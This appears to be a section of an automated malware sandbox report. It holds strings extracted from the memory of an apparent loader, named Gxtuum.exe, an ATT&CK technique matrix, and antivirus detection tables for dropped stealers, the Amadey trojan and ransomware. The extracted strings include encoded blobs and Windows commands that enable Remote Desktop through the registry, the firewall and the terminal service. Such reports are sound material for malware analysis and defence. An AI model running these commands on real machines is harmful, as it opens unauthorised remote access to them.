Source: 7739517025.exe, 0000000D.00000003.2664537518.0000000007061000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 0000000E.00000000.2667950394.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000E.00000000.2667950394.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 0000000E.00000002.2670334555.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000E.00000002.2670334555.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
Source: Gxtuum.exe, 0000000F.00000000.2677150593.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000F.00000000.2677150593.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	21 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 Extra Window Memory Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	23 File and Directory Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	14 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Browser Extensions	212 Process Injection	3 Obfuscated Files or Information	Security Account Manager	248 System Information Discovery	SMB/Windows Admin Shares	41 Data from Local System	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Scheduled Task/Job	2 Scheduled Task/Job	2 Scheduled Task/Job	13 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	1 Email Collection	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	991 Security Software Discovery	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	13 Process Discovery	VNC	GUI Input Capture	115 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	361 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	123 Masquerading	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	361 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	212 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	58%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	60%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	100%	Avira	HEUR/AGEN.1320706
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	100%	Joe Sandbox ML
C:\Program Files\Windows Media Player\graph\graph.exe	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	22%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	87%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]	75%	ReversingLabs	ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	55%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	68%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exe	58%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	22%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	68%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	55%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	63%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	87%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1019813001\cc6b47fc15.exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Bunifu_UI_v1.5.3.dll	0%	ReversingLabs
